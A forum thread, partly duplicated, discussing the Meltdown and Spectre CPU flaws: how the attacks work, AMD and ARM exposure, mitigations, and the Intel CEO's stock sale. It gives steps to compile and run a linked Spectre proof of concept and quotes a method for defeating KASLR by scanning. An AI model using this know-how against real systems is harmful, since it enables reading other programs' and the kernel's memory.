I’m impressed how easy it is to run this PoC - even for somebody who didn’t do C programming for years. Just one file, correct the line
#define CACHE_HIT_THRESHOLD(80)
to
#define CACHE_HIT_THRESHOLD 80
then compile:
gcc -O0 -o spectre spectre.c
run:
./spectre
and look for lines with “Success: “.
I am wondering if there is some PoC for JavaScript in the Browser - single HTML page with no dependencies containing everything to show the vulnerability?
I’ve been playing quickly with the PoC. It seems to work just fine on memory with PROT_WRITE only, but doesn’t work on memory protected with PROT_NONE. (At least on my CPU)
ETA: here’s the form 4 he filed. I’ve got to step out the door, but if anyone can figure out if this was reported to Intel before Nov 29 that would be interesting.
Good find. Looks like some press has it now, too. And a yc news commenter notes it’s not in their 10-Q, so that’s probably a couple counts in an indictment and a shareholder lawsuit.
Even if he knew, I think it matters whether this is a recurring event. If he always sells his shares at the end of the year, it would be insane to demand that he doesn’t do it.
Otherwise people could just start shorting as soon as they see an executive not selling stock, because they can
infer now that there is some bad news incoming.
That article is pretty misleading. It’s true that the November sale was “pursuant to a pre-arranged stock sale plan with an automated sale schedule,” but that stock sale plan was pre-arranged only in October, months after Google had notified Intel of these vulnerabilities.
I thought these all had to be disclosed on Form 4s. Maybe there’s another reporting vehicle I’m unaware of, but “Krzanich’s plan seems to involve getting stock grants at the beginning of each year and then selling as much as he can in the fourth quarter, which he has done consistently for a few years.” is not an accurate description of the record in the linked form 4s. His sales happen in every quarter and this is the only time he’s sold down to Intel’s minimum (eyeballing rather than making a running total, but it seems clear).
Meltdown is easy to exploit and gives access to kernel memory and other programs’ memory from userspace. Affects Intel CPUs. There is a kernel fix that more or less doubles the cost of context switches.
Spectre is hard to exploit and allows access to some other program’s memory. Affects all main CPU vendors who implement speculative execution. There is no fix, but some userspace mitigation should be possible, at the significant performance cost of preventing speculative execution.
In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.
This is likely an unprecedentedly huge problem for the next several decades (thinking of all the enterprise and embedded systems this affects), and the “mitigation” sections of the papers are not encouraging.
We present the first micro-architectural side-channel attack
which runs entirely in the browser. In contrast to
other works in this genre, this attack does not require the
attacker to install any software on the victim’s machine –
to facilitate the attack, the victim needs only to browse
to an untrusted webpage with attacker-controlled content.
This makes the attack model highly scalable and extremely
relevant and practical to today’s web, especially
since most desktop browsers currently accessing the Internet
are vulnerable to this attack. Our attack, which is
an extension of the last-level cache attacks of Yarom et
al. [23], allows a remote adversary recover information
belonging to other processes, other users and even other
virtual machines running on the same physical host as
the victim web browser.
To the best of my understanding, it builds on that work and is far, far worse.
Previously you could execute a timing attack (in JS) to observe the value of some piece of information that is being processed by the victim at the time your code runs.
My understanding is that now you can discern contents of a victim’s memory (that aren’t necessarily being touched at all by the victim) by doing something along the lines of:
causing the CPU to speculatively execute loads that are dependent on the value of data that you’re not supposed to be permitted to read
observing the effect of that speculated (and aborted) load on the state of the cache
by observing the state of the cache, glean some information about what is in the memory that you aren’t supposed to be allowed to read
because the attempt to read unreadable memory happened in an not-taken (only speculated) branch, it didn’t officially happen according to the ISA, so it doesn’t cause a segfault or anything that’d stop you carrying on with this nefarious deed
I need to read this again to be sure but I’m under the impression that Spectre is a relatively slow information leak that can be adapted to more or less any CPU with speculative execution but Meltdown is a much faster and hence practical attack that makes use of specific foibles of specific Intel chips.
In 2013, kernel address space
layout randomization (KASLR) had been introduced to
the Linux kernel (starting from version 3.14) allow-
ing to randomize the location of the kernel code at boot
time. However, only as recently as May 2017, KASLR
had been enabled by default in version 4.12. With
KASLR also the direct-physical map is randomized and,
thus, not fixed at a certain address such that the attacker
is required to obtain the randomized offset before mount-
ing the Meltdown attack. However, the randomization is
limited to 40 bit.
Thus, if we assume a setup of the target machine with
8 GB of RAM, it is sufficient to test the address space
for addresses in 8 GB steps. This allows to cover the
search space of 40 bit with only 128 tests in the worst
case. If the attacker can successfully obtain a value
from a tested address, the attacker can proceed dump-
ing the entire memory from that location. This allows to
mount Meltdown on a system despite being protected by
KASLR within seconds.
No. Neither KARL from OpenBSD nor KASLR from NetBSD would mitigate either Meltdown or Spectre in the slightest. Meltdown and Spectre are due to bugs in the underlying hardware.
The kernel virtual address space is MUCH more limited than 64 bits. Kernels are extremely leaky, too. And large. All you have to do is guess around the address space you think the kernel might be mapped at and wrok from there.
Additionally, KARL doesn’t randomize the address space. It randomizes the objects placed within it. So you’re still dealing with the same address space. Just start leaking data and parse it until you get something that makes sense.
On a lot of OSes, you might see some addresses that remain static in the kernel (VDSO, interrupt handlers, page tables, etc). Especially with physical address space instead of virtual.
Essentially, no matter what, there’s not enough entropy in the kernel address space to matter. And even if there was, these are hardware bugs, not software.
This is exactly why Linux is doing KPTI. It already had KASLR and that’s not effective. Randomizing the kernel address space, no matter how it’s done (KARL, KASLR, KASR) is worthless and ineffective.
Does anyone know: how can I see whether the version I have has these mitigation(s)? These announcements aren’t explicit about the version numbers that introduce the change.
Seems odd that project zero disclosed this six months ago and so many seem caught off guard. Was the problem only disclosed to CPU vendors and not to OS, compiler, browser vendors? And yet many of the mitigations are only now going into compilers+browsers?
The Firefox post has an update at the bottom listing the versions now. If you’re on the regular stable release they’re in 57.0.4, which was released on January 4.
It occurs to me that, in a real and practical sense, one of the biggest exploit mitigations we have at our disposal is the inaccessibility of hardware and kernel architecture knowledge due to complexity. The real reason the systems I’m in charge of aren’t compromised right now (to my knowledge) is because it’s complicated and I’m not on the radar of the few people who can do it.
I can’t wait to explain this one to friends and family. “So let me get this straight. My computer is going to be slower once I patch it? Why would I do that?!?”
It seems like all of these issues could be resolved if the processor’s microcode (or the OS’s kernel) had explicit control over cache invalidation. Any microarchitecture researchers here that can comment on the existence of or any research on explicit cache control?
I’ve always wondered why the cache can’t be controlled explicitly, even in user mode code. It seems like a lot of performance is probably left on the table by having it automated. It’s like how using garbage collection (GC) can simplify code, but at the cost of throwing away information about memory usage and then having the GC try to guess that information in real time.
My understanding (from David May’s lectures and asking lots of questions) is that memory caches are far too much on the hot path (of everything, all the time) to be controlled by microcode.
I remember he mentioned some processor (research? not mainstream, I think) being made with a mechanism wherein you could set a constant in a special register that would be added to the low bits of every physical address before it hit the cache system, so that you could have some user level control of which addresses alias each other. But I got the impression from that conversation that nobody had ever really seriously considered putting anything more than one adder’s worth of gate delays for user control of a cache system because it’s so important to performance and nobody could think of amazingly useful ways that running code could customise cache behaviour that can’t already be achieved well enough anyway using CPU features like prefetches or by cleverly changing the layout of your data structures.
I could image separate load/store instructions for uncached memory access, for example. ARM already has exclusive load/store in addition to normal ones.
You could design for non-coherent caches with software controlled cache line sync. Most data is not shared but the overhead for shared data is imposed on all transactions.
Software control is probably even slower. One problem is that the compiler has to insert the management instructions without dynamic information like a cache, which means a lot of unnecessary cache flushing.
If you go for software controlled, I would rather bet on fully software managed scratch pad memory. There seems to be no consensus how to use that well though.
Very few memory locations are shared - probably fewer should be shared. Snooping caches are designed to compensate for software with no structure to shared variables.
There’s been prototypes for a long time to make caches more secure with partitioning or randomization. I posted an example here in case anyone is curious about that sort of thing. Just Google those terms with cache and word secure to get to many others.
The spectre PoC linked elsewhere in this thread works perfectly on my Ryzen 5. From my reading, it sounds like AMD processors aren’t susceptible to userspace reading kernelspace because the cache is in some sense protection-level-aware, but the speculative-execution, cache-timing one-two punch still works.
From reading the google paper on this it’s not quite true but not quite false. According to google AMD and ARM are vulnerable to a specific limited form of Spectre. They’re not susceptible to Meltdown. The google Spectre PoCs for AMD and ARM aren’t successful in accessing beyond the user’s memory space so it’s thought that while the problem exists in some form it doesn’t lead to compromise as far as we currently know.
aren’t successful in accessing beyond the user’s memory space so … it doesn’t lead to compromise as far as we currently know.
Well, no compromise in the sense of breaking virtualization boundaries or OS-level protection boundaries, but still pretty worrying for compromising sandboxes that are entirely in one user’s memory space, like those in browsers.
AMD processors are not subject to the types of attacks that the kernel
page table isolation feature protects against. The AMD microarchitecture
does not allow memory references, including speculative references, that
access higher privileged data when running in a lesser privileged mode
when that access would result in a page fault.
Which is a much stronger statement than in the AMD web PR story. Given that it is AMD, I would not be surprised if their design does not have the problem but their PR is unable to make that clear.
I’ve read that some/most(?) Atom CPUs don’t have speculative execution or out of order execution. Is there a comprehensive List of x86_64 CPUs that have / don’t have those features?
I believe the only remotely recent Intel chips that completely lack speculative/OoO features are the Atoms based on the first-gen Bonnell microarchitecture. That started off 32-bit-only, but some of them towards the end of the run do have x86-64 support, e.g. the Atom D5xx and S12xx.
I believe next week a few people will start to take looks at alternative architectures. Maybe RISC-V just found an opening. A more diverse hardware landscape would be beneficial for society in general.
Why would I apply the patches against this on my home computer? One userspace process can steal from another userspace process? That’s just me and my one user.
Spectre PoC: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6 (I had to inline one #DEF, but otherwise works)
I’ve tested it with some success on FreeBSD/HardenedBSD on an Intel Xeon. It works on bare metal, but doesn’t work in bhyve.
oh god that runs quickly. terrifying.
That was kinda disappointing. (OpenBSD on Hyper-V here.)
It worked for me on OpenBSD running on real hardware.
perhaps it was the cache flush intrinsic.
I’m impressed how easy it is to run this PoC - even for somebody who didn’t do C programming for years. Just one file, correct the line
#define CACHE_HIT_THRESHOLD(80)
to
#define CACHE_HIT_THRESHOLD 80
then compile: gcc -O0 -o spectre spectre.c
run:
./spectre
and look for lines with “Success: “.
I am wondering if there is some PoC for JavaScript in the Browser - single HTML page with no dependencies containing everything to show the vulnerability?
I’ve been playing quickly with the PoC. It seems to work just fine on memory with PROT_WRITE only, but doesn’t work on memory protected with PROT_NONE. (At least on my CPU)
Side topic, this story may explain an odd story from two weeks ago about how the Intel CEO sold all the shares he could. If he doesn’t have rock-solid documentation that the trade was planned before he learned this, that’s probably insider trading. (Hat tip to @goodger prompting me to look up the SEC rule in the chat.)
ETA: here’s the form 4 he filed. I’ve got to step out the door, but if anyone can figure out if this was reported to Intel before Nov 29 that would be interesting.
From the project zero blog post:
Good find. Looks like some press has it now, too. And a yc news commenter notes it’s not in their 10-Q, so that’s probably a couple counts in an indictment and a shareholder lawsuit.
Even if he knew, I think it matters whether this is a recurring event. If he always sells his shares at the end of the year, it would be insane to demand that he doesn’t do it.
Otherwise people could just start shorting as soon as they see an executive not selling stock, because they can infer now that there is some bad news incoming.
It’s public information, there’s no need to speculate. He doesn’t.
Matt Levine is relaying Intel comments that are the opposite of what you’re saying.
That article is pretty misleading. It’s true that the November sale was “pursuant to a pre-arranged stock sale plan with an automated sale schedule,” but that stock sale plan was pre-arranged only in October, months after Google had notified Intel of these vulnerabilities.
I thought these all had to be disclosed on Form 4s. Maybe there’s another reporting vehicle I’m unaware of, but “Krzanich’s plan seems to involve getting stock grants at the beginning of each year and then selling as much as he can in the fourth quarter, which he has done consistently for a few years.” is not an accurate description of the record in the linked form 4s. His sales happen in every quarter and this is the only time he’s sold down to Intel’s minimum (eyeballing rather than making a running total, but it seems clear).
tl;dr:
Meltdown is easy to exploit and gives access to kernel memory and other programs’ memory from userspace. Affects Intel CPUs. There is a kernel fix that more or less doubles the cost of context switches.
Spectre is hard to exploit and allows access to some other program’s memory. Affects all main CPU vendors who implement speculative execution. There is no fix, but some userspace mitigation should be possible, at the significant performance cost of preventing speculative execution.
And this in the Spectre paper is horrifying:
This is likely an unprecedentedly huge problem for the next several decades (thinking of all the enterprise and embedded systems this affects), and the “mitigation” sections of the papers are not encouraging.
I didn’t read about Spectre yet, but I read a paper from 2015 saying the same thing (?):
The spy in the sandbox: Practical cache attacks in javascript and their implications
So does anyone know if Spectre is worse than this?
https://scholar.google.com/scholar?cluster=1498045933646289522&hl=en&as_sdt=0,5&sciodt=0,5
To the best of my understanding, it builds on that work and is far, far worse.
Previously you could execute a timing attack (in JS) to observe the value of some piece of information that is being processed by the victim at the time your code runs.
My understanding is that now you can discern contents of a victim’s memory (that aren’t necessarily being touched at all by the victim) by doing something along the lines of:
I need to read this again to be sure but I’m under the impression that Spectre is a relatively slow information leak that can be adapted to more or less any CPU with speculative execution but Meltdown is a much faster and hence practical attack that makes use of specific foibles of specific Intel chips.
LWN’s write-up was at the right level for me. I’ll read the papers when I have time. https://lwn.net/SubscriberLink/742702/83606d2d267c0193/
PS: go subscribe to LWN, it’s great.
Another good tl;dr
This is the one that finally made me understand it, well on a conceptual level.
Does OpenBSD mitigate Meltdown?
Not right now. I’m sure someone at OpenBSD is looking at it, though.
I’m curious if all the randomization protects machines.
/u/lattera is correct. From the Meltdown paper:
Emphasis my own.
No. Neither KARL from OpenBSD nor KASLR from NetBSD would mitigate either Meltdown or Spectre in the slightest. Meltdown and Spectre are due to bugs in the underlying hardware.
But how will you know which addresses to scan? How long would it take to scan a 64 bit address space?
The kernel virtual address space is MUCH more limited than 64 bits. Kernels are extremely leaky, too. And large. All you have to do is guess around the address space you think the kernel might be mapped at and wrok from there.
Additionally, KARL doesn’t randomize the address space. It randomizes the objects placed within it. So you’re still dealing with the same address space. Just start leaking data and parse it until you get something that makes sense.
On a lot of OSes, you might see some addresses that remain static in the kernel (VDSO, interrupt handlers, page tables, etc). Especially with physical address space instead of virtual.
Essentially, no matter what, there’s not enough entropy in the kernel address space to matter. And even if there was, these are hardware bugs, not software.
This is exactly why Linux is doing KPTI. It already had KASLR and that’s not effective. Randomizing the kernel address space, no matter how it’s done (KARL, KASLR, KASR) is worthless and ineffective.
Mitigations on the way from Chrome and Firefox.
Does anyone know: how can I see whether the version I have has these mitigation(s)? These announcements aren’t explicit about the version numbers that introduce the change.
Seems odd that project zero disclosed this six months ago and so many seem caught off guard. Was the problem only disclosed to CPU vendors and not to OS, compiler, browser vendors? And yet many of the mitigations are only now going into compilers+browsers?
The Firefox post has an update at the bottom listing the versions now. If you’re on the regular stable release they’re in 57.0.4, which was released on January 4.
The Arm developer site has a good overview of how this affects Arm processors. The whitepaper is also worth reading.
I wonder if an attacker could escalate privileges and/or achieve ring0 write access by combining Row Hammer with Meltdown and/or Spectre.
It occurs to me that, in a real and practical sense, one of the biggest exploit mitigations we have at our disposal is the inaccessibility of hardware and kernel architecture knowledge due to complexity. The real reason the systems I’m in charge of aren’t compromised right now (to my knowledge) is because it’s complicated and I’m not on the radar of the few people who can do it.
I can’t wait to explain this one to friends and family. “So let me get this straight. My computer is going to be slower once I patch it? Why would I do that?!?”
It seems like all of these issues could be resolved if the processor’s microcode (or the OS’s kernel) had explicit control over cache invalidation. Any microarchitecture researchers here that can comment on the existence of or any research on explicit cache control?
I’ve always wondered why the cache can’t be controlled explicitly, even in user mode code. It seems like a lot of performance is probably left on the table by having it automated. It’s like how using garbage collection (GC) can simplify code, but at the cost of throwing away information about memory usage and then having the GC try to guess that information in real time.
My understanding (from David May’s lectures and asking lots of questions) is that memory caches are far too much on the hot path (of everything, all the time) to be controlled by microcode.
I remember he mentioned some processor (research? not mainstream, I think) being made with a mechanism wherein you could set a constant in a special register that would be added to the low bits of every physical address before it hit the cache system, so that you could have some user level control of which addresses alias each other. But I got the impression from that conversation that nobody had ever really seriously considered putting anything more than one adder’s worth of gate delays for user control of a cache system because it’s so important to performance and nobody could think of amazingly useful ways that running code could customise cache behaviour that can’t already be achieved well enough anyway using CPU features like prefetches or by cleverly changing the layout of your data structures.
I could image separate load/store instructions for uncached memory access, for example. ARM already has exclusive load/store in addition to normal ones.
The architecture of snooping caches is ridiculously baroque.
Why is that? Afaik the only alternative is directory-based which has higher latency but scales better.
You could design for non-coherent caches with software controlled cache line sync. Most data is not shared but the overhead for shared data is imposed on all transactions.
Software control is probably even slower. One problem is that the compiler has to insert the management instructions without dynamic information like a cache, which means a lot of unnecessary cache flushing.
If you go for software controlled, I would rather bet on fully software managed scratch pad memory. There seems to be no consensus how to use that well though.
Very few memory locations are shared - probably fewer should be shared. Snooping caches are designed to compensate for software with no structure to shared variables.
Looking at the Spectre proof of concept code, it looks like there already actually is a way for user mode code to explicitly invalidate a cache line, and it’s used in the attack.
Perhaps a microcode patch could use this feature of the cache to invalidate any cache lines loaded by speculative execution?
There’s been prototypes for a long time to make caches more secure with partitioning or randomization. I posted an example here in case anyone is curious about that sort of thing. Just Google those terms with cache and word secure to get to many others.
Happy 2018, Lobsters!
Heartbleed might have been a small hole in the ship but these two are a full broadside.
AMD claims “zero vulnerability due to AMD architecture differences”, but without any explanation. Could someone enlighten us about this?
AMD’s inability to generate positive PR from this is really an incredible accomplishment for their fabled PR department.
The spectre PoC linked elsewhere in this thread works perfectly on my Ryzen 5. From my reading, it sounds like AMD processors aren’t susceptible to userspace reading kernelspace because the cache is in some sense protection-level-aware, but the speculative-execution, cache-timing one-two punch still works.
From reading the google paper on this it’s not quite true but not quite false. According to google AMD and ARM are vulnerable to a specific limited form of Spectre. They’re not susceptible to Meltdown. The google Spectre PoCs for AMD and ARM aren’t successful in accessing beyond the user’s memory space so it’s thought that while the problem exists in some form it doesn’t lead to compromise as far as we currently know.
Well, no compromise in the sense of breaking virtualization boundaries or OS-level protection boundaries, but still pretty worrying for compromising sandboxes that are entirely in one user’s memory space, like those in browsers.
I just found this in a Linux kernel commit:
Which is a much stronger statement than in the AMD web PR story. Given that it is AMD, I would not be surprised if their design does not have the problem but their PR is unable to make that clear.
AMD is not vulnerable to Meltdown, an Intel-specific attack.
AMD (and ARM, and essentially anything with a speculative execution engine on the planet) is vulnerable to Spectre.
One more link. Nothing new, but a succinct review of issues and mitigations. https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
More bonus link: https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/
Spectre/Meltdown documentation and resource collection repo
See also limitations of ASLR http://www.cs.vu.nl/~herbertb/download/papers/anc_ndss17.pdf
Reuters has a story with some quotes and a look at the research process.
I’ve read that some/most(?) Atom CPUs don’t have speculative execution or out of order execution. Is there a comprehensive List of x86_64 CPUs that have / don’t have those features?
I believe the only remotely recent Intel chips that completely lack speculative/OoO features are the Atoms based on the first-gen Bonnell microarchitecture. That started off 32-bit-only, but some of them towards the end of the run do have x86-64 support, e.g. the Atom D5xx and S12xx.
I believe next week a few people will start to take looks at alternative architectures. Maybe RISC-V just found an opening. A more diverse hardware landscape would be beneficial for society in general.
Why would I apply the patches against this on my home computer? One userspace process can steal from another userspace process? That’s just me and my one user.
And any javascript in your web browser, happily served to you without your knowledge by untrusted third parties.
Ah yes, fair enough.